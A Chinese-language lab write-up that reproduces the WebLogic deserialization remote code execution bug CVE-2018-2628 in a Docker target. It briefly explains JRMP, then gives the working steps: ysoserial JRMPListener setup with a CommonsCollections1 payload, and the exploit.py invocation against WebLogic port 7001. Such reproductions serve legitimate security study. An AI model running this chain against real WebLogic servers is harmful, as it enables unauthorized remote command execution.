本文的漏洞复现参考了https://github.com/brianwrf/CVE-2018-2628,在此感谢大佬的付出。
在此只把自己的复现过程做个记录
0.先提几个概念
JRMP:java remote method protocol,Java远程方法协议
JRMP是的Java技术协议的具体对象为希望和远程引用。JRMP只能是一个Java特有的,基于流的协议。相对于的RMI - IIOP的 ,该协议JRMP只能是一个对象的Java到Java的远程调用,这使得它依赖语言,意思是客户端和服务器必须使用Java。
JRMP:Java远程消息交换协议JRMP(Java Remote Messaging Protocol)
该协议基于TCP/IP,既然是作为信息交换协议,必然存在接收和发送两个端点,JRMPListener可以粗糙的理解为发送端,在本实验中意为攻击机上1099端口与weblogic靶机上的7001进行通信达到远程命令执行的目的。
1.安装靶机环境
docker pull zhiqzhao/ubuntu_weblogic1036_domain
docker run -d -p 7001:7001 zhiqzhao/ubuntu_weblogic1036_domain
#这里直接使用大佬配置好的环境
2.在JRMPListener主机上运行命令
这里采用的是Ubuntu16.04+docker,docker容器作为weblogic靶机,在此JRMPListener主机指的是Ubuntu16.04。
wget https://github.com/brianwrf/ysoserial/releases/download/0.0.6-pri-beta/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar
java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 'touch /tmp/sss666.txt'
#'touch /tmp/sss666.txt'为我想执行的命令,1099是JRMP Server监听的端口。
图中的172.17.0.2的ip为docker靶机的ip
3.运行exploit脚本
python exploit.py 172.17.0.2 7001 ../ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 10.185.43.215 1099 JRMPClien
#172.17.0.2 7001是weblogic靶机的IP和端口
#../ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 是ysoserial的本地路径根据自己真实路径填写
#10.185.43.215 1099的JRMP 一端的IP地址和端口
#JRMPClien是执行JRMPClient的类
4.进入docker靶机查看文件是否创建成功
docker exec -ti determined_stonebrak /bin/bash
#determined_stonebrak是我的docker靶机的名字,每个人创建的名字都不一样可使用docker ps查看NAME
ls /tmp/